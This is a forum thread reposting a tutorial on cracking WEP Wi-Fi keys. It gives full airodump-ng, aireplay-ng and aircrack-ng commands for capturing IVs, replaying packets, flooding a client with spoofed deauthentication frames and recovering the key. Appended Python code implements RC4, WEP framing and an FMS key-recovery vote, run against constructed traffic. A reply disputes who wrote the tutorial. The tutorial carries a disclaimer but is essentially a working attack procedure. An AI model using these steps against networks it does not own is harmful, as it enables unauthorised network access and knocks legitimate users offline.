#1

cracking a WEP Key

    Cracking WEP Key

    Analysis, Approach & Attack
    By Saurabh Harit
Well, this is a tut I've had stored on my comp and made a while back for a few people that requested it at a different site. ( ____________.com)

I don't want to post the site unless I get the OK from an admin or mod.



Note: This tut is for learning purposes and to make administrators aware of the weakness in WEP. It is illegal to perform such attacks on a network that you do not own. I will not be responsible for any kind of damage caused by you after reading this tut... sorry guys, I had to write this...

    Let's get started....

    Introduction:

This access point is configured to connect securely with the various legitimate clients using a 64 / 128 bit WEP encryption key. In a field scenario, once an attacker gains access to this WEP key, he/she will gain the privilege to authenticate himself/herself with the access point. This will open the door for many other wireless attacks. Some of them are as follows:

    1) Physical Layer Attacks or Jamming
2) Spoofed Disassociation and De-authentication Frame Floods
    3) Spoofed Malformed Authentication Frame Attack
    4) Filling Up the Access Point Association and Authentication Buffers
    5) Frame Deletion Attack
    6) DoS Attacks Based on Specific Wireless Network Settings
    7) Attacks Against 802.11i Implementations

    Approach

    Hardware Requirements:

Here is a list of the required hardware:

1) Wireless Access Point: this will be the target access point.
2) Two laptops: Machine1 and Machine2. Machine1 is the attacker's machine and Machine2 is a legitimate user who can connect to the access point using the WEP network key. Machine1 has no clue about the WEP network key of the access point.
3) A wireless network card. We used Netgear's WPN511 PCMCIA card for Machine1. This card comes with an Atheros chipset and has packet injection capabilities. Machine2 has a built-in wireless network card.

    Software Requirements:

Here is a list of the required software:

    1) Airodump-ng
    2) Aireplay-ng
    3) Aircrack-ng


    Airodump-ng is used to sniff the wireless traffic. It will help us locate our access point and the client connected with it. It will also show us details like operating channel, data rate, beacons, encryption type etc.

Aireplay-ng is used to replay data packets to access points and clients. This technique is used to increase the data transfer rate between the access point and client in order to generate more IVs. More than 20,000 IVs are required to break a 64 bit WEP key and more than 70,000 IVs are required to break a 128 bit WEP key. Without this technique, the attack becomes very slow.

    Aircrack-ng is used to crack the WEP keys once we have sufficient IVs.

First of all, we need to configure the access point and client. Once the configuration is done we can leave them and go back to the attack machine to break the WEP key implemented by the access point.

The first step is to configure a wireless network between the access point and the client laptop, i.e. Machine2. This network will be secured with the WEP key that we need to crack. Assign an SSID to your access point. Configure a 64 / 128 bit key.

    Information gathering:

We would require the following information to perform the attack:

    1) MAC address of access point.
    2) SSID of access point.
    3) Wireless channel of access point.
    4) MAC address of client associated with access point.


    Setup Machine1 (Attack machine):

Insert the PCMCIA wireless network card and boot the machine. Check the configuration using the following command.

    iwconfig

By default, as in my case, you will see only one interface, i.e. ath0. You will have to create a new wifi interface and put it in monitor mode. Use the following command:

    wlanconfig ath1 create wlandev wifi0 wlanmode monitor

    This will give you your wireless interface with name ath1 which will operate in monitor mode.

    ifconfig ath1 up

    This will start the wireless network card.

If you want to use the existing interface, i.e. ath0, use the following command to put it in monitor mode.

iwconfig ath0 mode Monitor

This command will put the card in Monitor mode. This is important for passive listening and packet injection (plus, your wireless network card should have packet injection capabilities).

    Use the following command to verify if your card is ready to sniff the wireless traffic.

iwlist ath1 scan

    Attack

    Following text describes the real attack which I performed on setup to crack the WEP encryption key.

Start airodump by typing the following command on your bash prompt:

airodump-ng --write data --ivs --band abg ath1

The above command will start airodump, which will start sniffing wireless traffic. The different parameters are detailed below:

- --write will write out the data to a file with the name "data". Every time you specify the same output file name, such as "data", airodump-ng will append "-##" to the file name, such as data-01.ivs, data-02.ivs, etc.
- --ivs will capture only Initialization Vectors
- --band will search bands a, b and g

Your screen will be divided into two parts. The upper half will display the access points and the lower half will display the clients. Find your access point in the upper half of the screen and note down the MAC address (BSSID), ESSID and the channel on which it is operating. We will require this information. Our aim is to collect as many IVs as possible. Every time data is exchanged between the access point and the associated client, each data packet will contain an IV. These IVs will then be fed to aircrack in order to crack the WEP key.

Although you will notice that tons of numbers (beacons) are flying by, the data is not updating very quickly. This is because airodump is scanning all the channels. From the upper half of the screen, we can find out the channel on which our access point is operating. In my case, it was 11. Abort airodump and re-run it to sniff on that specific channel. Use the following command:

airodump-ng --channel 11 --write data --ivs --band abg ath1

Airodump will now run at a much faster rate and update the data constantly. You will see a number rising very quickly; these are generally the beacons. Beacons basically say "hey, I'm an access point" about 10 times a second. You can judge the quality of your connection by how quickly the beacon count rises. Other than this, they are useless for our purposes. For this type of attack it is important that there is a client connected to the access point. So connect Machine2 to the access point wirelessly using the WEP encryption key. In airodump, you should see a client pop up at the bottom; the first MAC is the access point and the 2nd is the client associated with it. Write down the MAC address or BSSID of the client.


Open a new bash prompt and type the following command:

    aireplay-ng -2 -b APmac -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h CLmac ath1

where APmac is the MAC address of the access point and CLmac is the MAC address of the client, i.e. Machine2 in our case. The -d parameter is used for broadcasting the data. Aireplay will now start sniffing for a certain type of packet, with a length of no more and no less than 68 bytes, between the client and the access point. It will display "Read ### packets". At this point, if there is significant data transfer between the client and the access point, it will pull the right packet and prompt you to use it. In this case, hit Y to use the packet and skip the next step. If, however, it keeps reading packets for a while (more than a couple of minutes) and does not pop up saying "Use this packet?", then open a new bash prompt and type the following command:

    aireplay-ng -0 15 -a APmac -c CLmac ath1

The above command will send out 15 de-authentication packets to the client, spoofing the identity of the access point. So the client will think that the packets are coming from the legitimate access point, will disconnect itself from the wireless network and will try to re-connect after a while. It is this re-connection packet that we are trying to sniff.
Note: The normal data exchange rate between the access point and the client is not very fast. Collecting enough IVs at this rate to crack WEP keys will consume a lot of time, so we need to speed up the process. This is done by sending data packets to the access point at a faster rate. If the packet is valid and the access point thinks that the packet is coming from the legitimate client, it will send back a reply which will also contain an IV. We get a valid packet when the client tries to re-connect to the access point. Aireplay then uses this packet to flood the access point, spoofing the identity of the legitimate client.
Go back to the first instance of aireplay and you should see something at the bottom of the screen saying "Use this packet?". Hit 'y' and aireplay will flood the access point with this packet. Switch back to airodump and you should see the data rate going up significantly.


If aireplay has picked up any more packets, it will prompt you again, asking if you want to use them. Try more packets. Also, you may need to get closer to your access point, or try the aireplay-ng -0 method again. Experiment with it. Once you've got the data rate going up quickly, start aircrack-ng to crack the WEP key. Type in the following command:

    aircrack-ng -f 2 -a 1 -b APmac -n 64 data-01.ivs

The -n parameter can be 64 or 128 depending on the length of the WEP key you have set on the access point. Aircrack will scan the IVs collected and analyze them. After a while of analysis, it will spit out the WEP encryption key.

    Boom....The WEP encryption key has been successfully cracked...

Just don't be stupid once you do this. It may lead to some serious stuff.

Oh, one more thing I forgot to add:

About aircrack, for you people who don't understand... It's not compatible with most network cards, not compatible with most network drivers, not compatible with internal wifi drivers; it only works with wireless cards that have raw monitor mode (monitoring packets through the card)... It's best run on a Linux machine, so try looking up dual-booting Linux with your OS. The Linux version does not work with PSPLinux (for you people who would try).

(Oh, and I also started working on a port for PSP, and was able to get most of it working, but for some odd reason when it finished the attack the WEP code was still encrypted. The PSP internal wifi does monitor packets by default (but the Linux version doesn't detect the driver), so I ported it to PSP and took all features off except a few; it was easy to detect the internal wifi driver.)
    Last edited by SonniE; 07-17-2008 at 10:27 PM.
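
The post above collects IVs and hands them to aircrack-ng, but never shows what those IVs leak. The following is an added example, not code from the post or from the aircrack-ng project: it builds WEP frame bodies the way an access point would (RC4 keyed with IV||key, CRC-32 ICV), extracts the (IV, first ciphertext byte) pairs that `airodump-ng --ivs` keeps, shows why two frames under one IV are fatal, and runs the original FMS vote (the attack family behind aircrack's older `-K` mode; the default PTW mode uses more IV classes, which is why it needs far fewer packets) against constructed traffic. The key, the IVs and the frames are all constructed here; the FMS step is statistical, so it can pick a wrong byte for some keys, exactly as the real attack does.

```python
# Added example (not code from the original post): what the IVs that
# airodump-ng --ivs collects actually leak. RC4, WEP framing, IV
# extraction and an FMS-style vote over constructed frames, offline.
import struct
import zlib
from collections import Counter

SNAP = 0xAA  # every 802.11 data frame starts with the LLC/SNAP DSAP byte 0xAA


def rc4(key, n):
    """Plain RC4: key scheduling (KSA), then n keystream bytes (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, payload, key_id=0):
    """WEP frame body: IV(3) | key-id(1) | RC4(iv||key) XOR (payload || CRC-32 ICV).
    The 24-bit IV travels in the clear; that is what the attacker harvests."""
    icv = struct.pack("<I", zlib.crc32(payload))
    ks = rc4(iv + key, len(payload) + 4)
    return iv + bytes([key_id << 6]) + bytes(a ^ b for a, b in zip(payload + icv, ks))


def extract_ivs(bodies):
    """The part airodump-ng --ivs keeps per frame: (IV, first ciphertext byte)."""
    return [(body[:3], body[4]) for body in bodies]


def is_fms_weak(iv, b):
    """Classic FMS weak IV class for secret key byte b: (b+3, 0xFF, X)."""
    return iv[0] == b + 3 and iv[1] == 0xFF


def fms_vote(iv, c0, known):
    """One vote for secret key byte len(known). Run the KSA only as far as the
    bytes we know (IV + recovered prefix); if the state is 'resolved', the first
    keystream byte (known, because the first plaintext byte is 0xAA) pins the
    next key byte with probability of roughly 5%, and is noise otherwise."""
    b = len(known)
    k = iv + known
    S = list(range(256))
    j = 0
    for i in range(b + 3):
        j = (j + S[i] + k[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= b + 3 or (S[1] + S[S[1]]) & 0xFF != b + 3:
        return None  # not resolved: this IV says nothing about key byte b
    z = c0 ^ SNAP
    return (S.index(z) - j - S[b + 3]) & 0xFF


def fms_recover(samples, key_len):
    """Byte-by-byte majority vote. Statistical: it can fail for some keys, which
    is why aircrack-ng uses more IV classes (KoreK, PTW) and many more IVs."""
    known = b""
    for _ in range(key_len):
        votes = Counter()
        for iv, c0 in samples:
            guess = fms_vote(iv, c0, known)
            if guess is not None:
                votes[guess] += 1
        if not votes:
            raise ValueError("no resolved IVs for key byte %d" % len(known))
        known += bytes([votes.most_common(1)[0][0]])
    return known


def keystream_reuse(body_a, body_b, plaintext_a):
    """Two frames under one IV share keystream: C_a ^ C_b ^ P_a = P_b."""
    assert body_a[:3] == body_b[:3], "different IVs, keystreams differ"
    return bytes(x ^ y ^ p for x, y, p in zip(body_a[4:], body_b[4:], plaintext_a))


def simulate_capture(key):
    """Constructed traffic: one frame per FMS weak IV for each secret key byte
    (a real card cycles through IVs, so an attacker waits for these to appear)."""
    llc = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # LLC/SNAP header of an ARP frame
    return [wep_encrypt(key, bytes([b + 3, 0xFF, x]), llc)
            for b in range(len(key)) for x in range(256)]


if __name__ == "__main__":
    key = bytes.fromhex("1f2e3d4c5b")  # constructed 40-bit key ("64-bit WEP")
    samples = extract_ivs(simulate_capture(key))
    print("weak IVs for byte 0:", sum(is_fms_weak(iv, 0) for iv, _ in samples))
    print("recovered:", fms_recover(samples, len(key)).hex(), "real:", key.hex())
```

Two things to take from running it: `extract_ivs` keeps only four bytes per frame, which is why the `.ivs` files in the post stay small while holding everything the cracker needs, and `keystream_reuse` needs no key at all, only one IV collision and one frame whose plaintext (an ARP or LLC header) is predictable.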

#2

Quote Originally Posted by oneshotkill
    Cracking WEP Key

    Analysis, Approach & Attack
    By xOneShotKillx

    Ugh, this is starting to get really annoying.

    http://www.elitehackers.info/forums/...ad.php?p=67039

Hmmm.... I don't think you're "Saurabh Harit".





